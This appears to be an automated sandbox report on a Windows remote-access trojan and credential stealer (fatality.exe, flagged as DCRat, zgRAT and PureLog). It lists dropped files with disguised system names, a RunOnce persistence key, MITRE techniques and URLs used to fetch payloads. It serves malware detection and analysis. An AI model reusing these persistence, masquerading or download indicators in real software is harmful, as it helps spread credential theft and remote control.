                                      Source: Yara matchFile source: 00000001.00000003.1705089952.00000000056A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 0000000D.00000000.1823570813.0000000000D82000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000001.00000003.1704006119.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: C:\blockcomSession\Idle.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\blockcomSession\containerReview.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\blockcomSession\smss.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\Desktop\fatality.exe , type: DROPPED
                                      Yara detected zgRAT
                                      Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                      Source: Yara matchFile source: 1.3.fatality.exe .57e06fb.1.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .6f796fb.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 13.0.containerReview.exe.d80000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .57e06fb.1.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .6f796fb.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: C:\blockcomSession\Idle.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\blockcomSession\containerReview.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\blockcomSession\smss.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\Desktop\fatality.exe , type: DROPPED

                                      Remote Access Functionality

                                      barindex
                                      Yara detected DCRat
                                      Source: Yara matchFile source: 0000000D.00000002.1915424378.000000001346B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: containerReview.exe PID: 7868, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe PID: 7656, type: MEMORYSTR
                                      Yara detected PureLog Stealer
                                      Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                      Source: Yara matchFile source: 1.3.fatality.exe .57e06fb.1.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .6f796fb.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 13.0.containerReview.exe.d80000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .57e06fb.1.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .6f796fb.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000001.00000003.1705089952.00000000056A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 0000000D.00000000.1823570813.0000000000D82000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000001.00000003.1704006119.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: C:\blockcomSession\Idle.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\blockcomSession\containerReview.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\blockcomSession\smss.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\Desktop\fatality.exe , type: DROPPED
                                      Yara detected zgRAT
                                      Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                      Source: Yara matchFile source: 1.3.fatality.exe .57e06fb.1.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .6f796fb.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 13.0.containerReview.exe.d80000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .57e06fb.1.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .6f796fb.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: C:\blockcomSession\Idle.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\blockcomSession\containerReview.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\blockcomSession\smss.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\Desktop\fatality.exe , type: DROPPED

                                      Mitre Att&ck Matrix

                                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                      Gather Victim Identity Information11
                                      Scripting                                      		Valid Accounts11
                                      Windows Management Instrumentation                                      		11
                                      Scripting                                      		1
                                      Exploitation for Privilege Escalation                                      		1
                                      Disable or Modify Tools                                      		OS Credential Dumping3
                                      File and Directory Discovery                                      		1
                                      Taint Shared Content                                      		1
                                      Archive Collected Data                                      		3
                                      Ingress Tool Transfer                                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                      CredentialsDomainsDefault Accounts3
                                      Command and Scripting Interpreter                                      		1
                                      DLL Side-Loading                                      		1
                                      DLL Side-Loading                                      		1
                                      Deobfuscate/Decode Files or Information                                      		LSASS Memory25
                                      System Information Discovery                                      		Remote Desktop ProtocolData from Removable Media1
                                      Encrypted Channel                                      		Exfiltration Over BluetoothNetwork Denial of Service
                                      Email AddressesDNS ServerDomain Accounts1
                                      Scheduled Task/Job                                      		1
                                      Windows Service                                      		1
                                      Windows Service                                      		3
                                      Obfuscated Files or Information                                      		Security Account Manager311
                                      Security Software Discovery                                      		SMB/Windows Admin SharesData from Network Shared Drive3
                                      Non-Application Layer Protocol                                      		Automated ExfiltrationData Encrypted for Impact
                                      Employee NamesVirtual Private ServerLocal AccountsCron1
                                      Scheduled Task/Job                                      		211
                                      Process Injection                                      		34
                                      Software Packing                                      		NTDS251
                                      Virtualization/Sandbox Evasion                                      		Distributed Component Object ModelInput Capture13
                                      Application Layer Protocol                                      		Traffic DuplicationData Destruction
                                      Gather Victim Network InformationServerCloud AccountsLaunchd21
                                      Registry Run Keys / Startup Folder                                      		1
                                      Scheduled Task/Job                                      		1
                                      DLL Side-Loading                                      		LSA Secrets2
                                      Process Discovery                                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                                      Registry Run Keys / Startup Folder                                      		1
                                      File Deletion                                      		Cached Domain Credentials1
                                      Application Window Discovery                                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items333
                                      Masquerading                                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                                      Virtualization/Sandbox Evasion                                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                                      Process Injection                                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                      Behavior Graph

                                      Hide Legend

                                      Legend:

                                      • Process
                                      • Signature
                                      • Created File
                                      • DNS/IP Info
                                      • Is Dropped
                                      • Is Windows Process
                                      • Number of created Registry Values
                                      • Number of created Files
                                      • Visual Basic
                                      • Delphi
                                      • Java
                                      • .Net C# or VB.NET
                                      • C, C++ or other language
                                      • Is malicious
                                      • Internet
                                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590002 Sample: fatality.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 97 googlecode.l.googleusercontent.com 2->97 99 codecmd03.googlecode.com 2->99 101 3 other IPs or domains 2->101 103 Antivirus detection for dropped file 2->103 105 Antivirus / Scanner detection for submitted sample 2->105 107 Multi AV Scanner detection for dropped file 2->107 109 17 other signatures 2->109 12 fatality.exe 1 3 2->12         started        16 Idle.exe 2->16         started        18 svchost.exe 2->18 injected 20 6 other processes 2->20 signatures3 process4 file5 87 C:\Windows\Resources\Themes\icsys.icn.exe, MS-DOS 12->87 dropped 89 C:\Users\user\Desktop\fatality.exe, PE32 12->89 dropped 145 Drops executables to the windows directory (C:\Windows) and starts them 12->145 22 fatality.exe 3 6 12->22         started        26 icsys.icn.exe 3 12->26         started        147 Antivirus detection for dropped file 16->147 149 Multi AV Scanner detection for dropped file 16->149 151 Machine Learning detection for dropped file 16->151 153 Injects code into the Windows Explorer (explorer.exe) 18->153 28 explorer.exe 18->28         started        signatures6 process7 file8 71 C:\blockcomSession\containerReview.exe, PE32 22->71 dropped 73 RezYUes00TmmVGwINj...2Ra62zGWDtewTBc.vbe, data 22->73 dropped 113 Hides threads from debuggers 22->113 30 wscript.exe 1 22->30         started        75 C:\Windows\Resources\Themes\explorer.exe, MS-DOS 26->75 dropped 115 Antivirus detection for dropped file 26->115 117 Machine Learning detection for dropped file 26->117 119 Drops PE files with benign system names 26->119 33 explorer.exe 15 26->33         started        signatures9 process10 dnsIp11 155 Windows Scripting host queries suspicious COM object (likely to drop second stage) 30->155 37 cmd.exe 30->37         started        91 64.233.167.82, 49732, 49737, 49744 GOOGLEUS United States 33->91 93 googlecode.l.googleusercontent.com 66.102.1.82, 49730, 49733, 49741 GOOGLEUS United States 33->93 95 74.125.133.82, 49731, 49734, 49743 GOOGLEUS United States 33->95 67 C:\Windows\Resources\spoolsv.exe, MS-DOS 33->67 dropped 157 Antivirus detection for dropped file 33->157 159 System process connects to network (likely due to code injection or exploit) 33->159 161 Machine Learning detection for dropped file 33->161 163 Drops PE files with benign system names 33->163 39 spoolsv.exe 3 33->39         started        file12 signatures13 process14 file15 43 containerReview.exe 37->43         started        47 conhost.exe 37->47         started        77 C:\Windows\Resources\svchost.exe, MS-DOS 39->77 dropped 121 Antivirus detection for dropped file 39->121 123 Machine Learning detection for dropped file 39->123 125 Drops executables to the windows directory (C:\Windows) and starts them 39->125 127 Drops PE files with benign system names 39->127 49 svchost.exe 2 2 39->49         started        signatures16 process17 file18 79 C:\blockcomSession\smss.exe, PE32 43->79 dropped 81 C:\blockcomSession\Idle.exe, PE32 43->81 dropped 83 C:\...\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, PE32 43->83 dropped 85 10 other malicious files 43->85 dropped 129 Multi AV Scanner detection for dropped file 43->129 131 Detected unpacking (creates a PE file in dynamic memory) 43->131 133 Creates an undocumented autostart registry key 43->133 143 5 other signatures 43->143 51 csc.exe 43->51         started        55 schtasks.exe 43->55         started        57 schtasks.exe 43->57         started        61 16 other processes 43->61 135 Antivirus detection for dropped file 49->135 137 Detected CryptOne packer 49->137 139 Machine Learning detection for dropped file 49->139 141 Drops executables to the windows directory (C:\Windows) and starts them 49->141 59 spoolsv.exe 49->59         started        signatures19 process20 file21 69 C:\Windows\...\SecurityHealthSystray.exe, PE32 51->69 dropped 111 Infects executable files (exe, dll, sys, html) 51->111 63 conhost.exe 51->63         started        65 cvtres.exe 51->65         started        signatures22 process23

                                      Screenshots

                                      Thumbnails

                                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                      windows-stand

                                      Antivirus, Machine Learning and Genetic Malware Detection

                                      Initial Sample

                                      SourceDetectionScannerLabelLink
                                      fatality.exe97%ReversingLabsWin32.Trojan.Golsys
                                      fatality.exe100%AviraVBS/Runner.VPG
                                      fatality.exe100%Joe Sandbox ML

                                      Dropped Files

                                      SourceDetectionScannerLabelLink
                                      C:\Windows\Resources\Themes\icsys.icn.exe100%AviraTR/Patched.Ren.Gen
                                      C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe100%AviraTR/Spy.Agent.cptjt
                                      C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe100%AviraTR/Spy.Agent.cptjt
                                      C:\Windows\Resources\svchost.exe100%AviraTR/Patched.Ren.Gen
                                      C:\Users\user\Desktop\zRrwKlet.log100%AviraTR/AVI.Agent.updqb
                                      C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe100%AviraTR/Spy.Agent.cptjt
                                      C:\blockcomSession\Idle.exe100%AviraTR/Spy.Agent.cptjt
                                      C:\Users\user\AppData\Local\Temp\Q048Q85hCW.bat100%AviraBAT/Delbat.C
                                      C:\Users\user\Desktop\fatality.exe 100%AviraVBS/Runner.VPG
                                      C:\Users\user\Desktop\SdSCeHzI.log100%AviraTR/PSW.Agent.qngqt
                                      C:\Windows\Resources\Themes\explorer.exe100%AviraTR/Patched.Ren.Gen
                                      C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe100%AviraVBS/Runner.VPG
                                      C:\Windows\Resources\spoolsv.exe100%AviraTR/Patched.Ren.Gen
                                      C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                      C:\Windows\Resources\Themes\icsys.icn.exe100%Joe Sandbox ML
                                      C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe100%Joe Sandbox ML
                                      C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe100%Joe Sandbox ML
                                      C:\Windows\Resources\svchost.exe100%Joe Sandbox ML
                                      C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe100%Joe Sandbox ML
                                      C:\Users\user\Desktop\hEPrrPJe.log100%Joe Sandbox ML
                                      C:\blockcomSession\Idle.exe100%Joe Sandbox ML
                                      C:\Users\user\Desktop\fatality.exe 100%Joe Sandbox ML
                                      C:\Users\user\Desktop\SdSCeHzI.log100%Joe Sandbox ML
                                      C:\Windows\Resources\Themes\explorer.exe100%Joe Sandbox ML
                                      C:\Users\user\Desktop\FJTVnRjh.log100%Joe Sandbox ML
                                      C:\Windows\Resources\spoolsv.exe100%Joe Sandbox ML
                                      C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                      C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe77%VirustotalBrowse
                                      C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                      C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe77%VirustotalBrowse
                                      C:\Users\user\Desktop\FJTVnRjh.log8%ReversingLabs
                                      C:\Users\user\Desktop\FJTVnRjh.log11%VirustotalBrowse
                                      C:\Users\user\Desktop\SdSCeHzI.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                      C:\Users\user\Desktop\SdSCeHzI.log69%VirustotalBrowse
                                      C:\Users\user\Desktop\XWvbHmEw.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                      C:\Users\user\Desktop\ZKzjsAAu.log25%ReversingLabs
                                      C:\Users\user\Desktop\fatality.exe 71%ReversingLabsWin32.Trojan.DCRat
                                      C:\Users\user\Desktop\hEPrrPJe.log29%ReversingLabsWin32.Trojan.Generic
                                      C:\Users\user\Desktop\zRrwKlet.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                      C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                      C:\blockcomSession\Idle.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                      C:\blockcomSession\containerReview.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper
                                      C:\blockcomSession\smss.exe83%ReversingLabsByteCode-MSIL.Trojan.Dnoper

                                      Unpacked PE Files

                                      No Antivirus matches

                                      Domains

                                      No Antivirus matches

                                      URLs

                                      No Antivirus matches

                                      Domains and IPs

                                      Contacted Domains

                                      NameIPActiveMaliciousAntivirus DetectionReputation
                                      googlecode.l.googleusercontent.com
                                      		66.102.1.82
                                      		truefalse
                                        		high
                                        codecmd01.googlecode.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          codecmd03.googlecode.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            codecmd02.googlecode.com
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://codecmd01.googlecode.com/files/tjcm.giffalse
                                                		high
                                                http://codecmd02.googlecode.com/files/tjcm.giffalse
                                                  		high
                                                  http://codecmd03.googlecode.com/files/tjcm.giffalse
                                                    		high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://codecmd03.googlecode.com/files/tjcm.gifWexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://codecmd02.googlecode.com/explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://codecmd03.googlecode.com/=C:explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://codecmd02.googlecode.com/files/tjcm.gif5explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.enigmaprotector.com/openUfatality.exe , 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpfalse
                                                              		high
                                                              http://codecmd01.googlecode.com/files/tjcm.gifh3Pexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://codecmd01.googlecode.com/googlecode.com/ER_PROFILE_STRING=DefaultHOMEDRIVEexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://codecmd01.googlecode.com/googlecode.com/rentVersionexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://codecmd02.googlecode.com/files/tjcm.gifmesexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://codecmd01.googlecode.com/files/tjcm.gifmesexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://codecmd03.googlecode.com/files/tjcm.giflexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://codecmd01.googlecode.com/files/tjcm.gifXexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://codecmd03.googlecode.com/files/tjcm.gifnexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://codecmd02.googlecode.com/files/tjcm.gifFexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://codecmd02.googlecode.com/softexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://codecmd03.googlecode.com/files/tjcm.gif1explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://codecmd03.googlecode.com/googlecode.com/explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://codecmd02.googlecode.com/files/tjcm.gifjaqfwbriwnsrwrrkxnqbqxkxexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://codecmd01.googlecode.com/explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://codecmd01.googlecode.com/files/tjcm.gifKexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://codecmd03.googlecode.com/files/tjcm.gif~explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://codecmd02.googlecode.com/fileseZClXsFjAqFWBriWnSRWrRKXnqBqXkXexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://codecmd03.googlecode.com/googlecode.com/Microsoftexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://codecmd02.googlecode.com/googlecode.com/explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://codecmd03.googlecode.com/files/tjcm.gifBexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://codecmd03.googlecode.com/explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://codecmd01.googlecode.com/files/tjcm.gif?explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://codecmd02.googlecode.com/googlecode.com/4explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://codecmd03.googlecode.com/files/tjcm.gifHexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://codecmd02.googlecode.com/files/tjcm.gifmexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://codecmd02.googlecode.com/rexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://codecmd02.googlecode.com/ultipart/x-mixed-replaceexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://codecmd01.googlecode.com/files/tjcm.gifyexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.enigmaprotector.com/fatality.exe , 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecontainerReview.exe, 0000000D.00000002.1906268968.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp, containerReview.exe, 0000000D.00000002.1906268968.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://codecmd01.googlecode.com/files/tjcm.gif4explorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://codecmd01.googlecode.com/files/tjcm.gif/kexplorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://codecmd01.googlecode.com/files/tjcm.gifrexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://codecmd02.googlecode.com/files/tjcm.gifm.exeexplorer.exe, 00000003.00000002.2940622995.0000000000617000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high

                                                                                                                                  World Map of Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public IPs

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  74.125.133.82
                                                                                                                                  		unknownUnited States
                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                  64.233.167.82
                                                                                                                                  		unknownUnited States
                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                  66.102.1.82
                                                                                                                                  		googlecode.l.googleusercontent.comUnited States
                                                                                                                                  		15169GOOGLEUSfalse

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                  Analysis ID:1590002
                                                                                                                                  Start date and time:2025-01-13 13:16:10 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 11m 0s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:55
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:fatality.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.spre.troj.expl.evad.winEXE@56/42@3/3
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 18.2%
                                                                                                                                  HCA Information:Failed
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                  Warnings

                                                                                                                                  • Exclude process from analysis (whitelisted): Conhost.exe, consent.exe, SIHClient.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                                                                  • Excluded domains from analysis (whitelisted): 373292cm.nyashka.top, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Execution Graph export aborted for target DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, PID 5672 because it is empty
                                                                                                                                  • Execution Graph export aborted for target DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, PID 7656 because it is empty
                                                                                                                                  • Execution Graph export aborted for target Idle.exe, PID 7232 because it is empty
                                                                                                                                  • Execution Graph export aborted for target Idle.exe, PID 7468 because it is empty
                                                                                                                                  • Execution Graph export aborted for target containerReview.exe, PID 7868 because it is empty
                                                                                                                                  • Execution Graph export aborted for target explorer.exe, PID 7540 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target explorer.exe, PID 7752 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target smss.exe, PID 404 because it is empty
                                                                                                                                  • Execution Graph export aborted for target smss.exe, PID 7480 because it is empty
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  07:17:07API Interceptor3958x Sleep call for process: svchost.exe modified
                                                                                                                                  07:17:07API Interceptor1598x Sleep call for process: explorer.exe modified
                                                                                                                                  12:17:08AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\resources\themes\explorer.exe RO
